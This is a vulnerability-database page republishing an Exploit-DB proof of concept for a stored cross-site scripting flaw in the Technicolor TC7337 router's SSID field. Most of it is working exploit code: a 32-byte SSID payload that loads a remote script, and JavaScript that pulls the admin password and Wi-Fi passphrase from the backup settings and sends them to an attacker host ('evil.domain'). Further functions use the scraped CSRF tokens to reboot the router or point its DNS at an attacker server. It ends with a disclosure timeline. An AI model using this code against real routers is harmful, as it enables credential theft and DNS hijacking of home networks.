Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Technicolor TC7337 - 'SSID' Persistent Cross-Site Scripting

🗓️ 03 Aug 2017 00:00:00Reported by Geolado gioladoType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 90 Views

Technicolor TC7337 'SSID' Persistent Cross-Site Scripting via 'wlscanresults.html' UR

Code
// Device : Technicolor TC7337
// Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html
// XSS through SSID : '><script src=//url.co></script>   ( Exactly 32 bytes u_u )
//                             ^
//  5char domains are running  |    'src' does not requires quotes , and passing the URL with ony '//'
//  out, grab yours !          +---> it will cause the browser to make the request with the current protocol,
//                                   which is HTTP , duh
// Below is the content of url.co/index.html
// index.html ( which is just a JavaScript actually, but we have to use the index to fit the 32 chars ) :

function get_passwords(attackers_server) {
  // attackers_server = server to send the credentials
  // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  // XSS to get Admin's login/passwd + Wifi passphrase
  // from backup settings

  xmlhttp=new XMLHttpRequest();
  xmlhttp.open("GET", "/backupsettings.cmd", false); // GET the Backup XML
  xmlhttp.send();
  var k = xmlhttp.responseText.indexOf("Admin") ; // Search for Admin's Login and Password
  var y = xmlhttp.responseText.indexOf("KeyPassphrase") ; // Search for Wifi PassPhrase
  // Add a img requesting the attacker website with the leaked passwords in the GET parameters
  document.write('<img src="'+attackers_server+'?net='+ encodeURIComponent(xmlhttp.responseText.slice(k,k+100)+xmlhttp.responseText.slice(y,y+80))+'">');
}

function reboot_router() {
  // XSS + CSRF reboot router
  // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  // Why? Because It's fun to watch a XSS doing 'physical' stuff

  xmlhttp=new XMLHttpRequest();
  xmlhttp.open("GET", "/resetrouter.html", false); // GET the page of the reset interface
  xmlhttp.send();
  var w = xmlhttp.responseText.indexOf("Key") ; // Search for the SessionKey, some sort of CSRF Token
  var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex because the key is inside quotes

  xmlhttp=new XMLHttpRequest();
  xmlhttp.open("GET", "/rebootinfo.cgi?sessionKey="+sessionKey, false);
// Request the reboot page with the CSRF token
  xmlhttp.send();
}

function dns_poisoning(attackers_dns) {
  // attackers_dns = malicious DNS Server
  // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ holy shit my code is ugly as fuck , sorry world
  // Alter the DNS Config of the Router
  // changing the Primary and Secondary DNS to the attacker's one

  xmlhttp=new XMLHttpRequest();  
  xmlhttp.open("GET", "/rede-dnsv4.html", false); // GET the DNS Config page
  xmlhttp.send();
  var w = xmlhttp.responseText.indexOf("Key") ; // Search for the SessionKey, some sort of CSRF Token
  var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1]; // Regex because the key is inside quotes
  var i_wanip = xmlhttp.responseText.indexOf("wanip");
  var wanip = xmlhttp.responseText.slice(i_wanip,i_wanip+30).match(/'([^']+)'/)[1];
  var i_wansubnet = xmlhttp.responseText.indexOf("wansubnet");
  var wansubnet = xmlhttp.responseText.slice(i_wansubnet,i_wansubnet+30).match(/'([^']+)'/)[1];
  var i_wangatewayip = xmlhttp.responseText.indexOf("wangatewayip");
  var wangatewayip = xmlhttp.responseText.slice(i_wangatewayip,i_wangatewayip+30).match(/'([^']+)'/)[1];

  xmlhttp=new XMLHttpRequest();
  xmlhttp.open("GET", "/rede-dnsv4.cgi?enblDhcpClnt=0&wanIpAddress="+wanip+"&wanIfName=wanbridge&wanSubnetMask="+wansubnet+"&wanIntfGateway="+wangatewayip+"&dnsPrimary="+attackers_dns+"&dnsSecondary="+attackers_dns+"&sessionKey="+sessionKey, false);
  xmlhttp.send(); // Send the request to SAVE the Primary and Secondary DNS with the CSRF Token

  //After saving we need to apply the settings. yeah, fuck logic --'

  //Getting a brand NEW SessionKey
  xmlhttp=new XMLHttpRequest();  
  xmlhttp.open("GET", "/rede-dnsv4.html", false); // GET the DNS Config page
  xmlhttp.send();
  var w = xmlhttp.responseText.indexOf("Key") ; // Search for the SessionKey, some sort of CSRF Token
  var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex because the key is inside quotes

  xmlhttp=new XMLHttpRequest();  
  xmlhttp.open("GET", "/wandnscfg.cmd?sessionKey="+sessionKey, false);
// GET the apply DNS page
  xmlhttp.send();
}

//Choose your path !
//get_passwords("https://evil.domain/") ;
//reboot_router();
dns_poisoning("1.3.3.7")

// TimeLine
// ---------
// 08/07/2017 - First email sent to the vendor (no answer)
// 16/07/2017 - Second email sent to the vendor (no answer)
// 18/07/2017 - Third email sent to the vendor (no answer)
// 02/08/2017 - Full Disclosure

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Aug 2017 00:00Current
7.4High risk
Vulners AI Score7.4
technicolor tc7337persistent cross-site scriptingwlscanresults.htmlxssjavascriptcsrfdns poisoning
90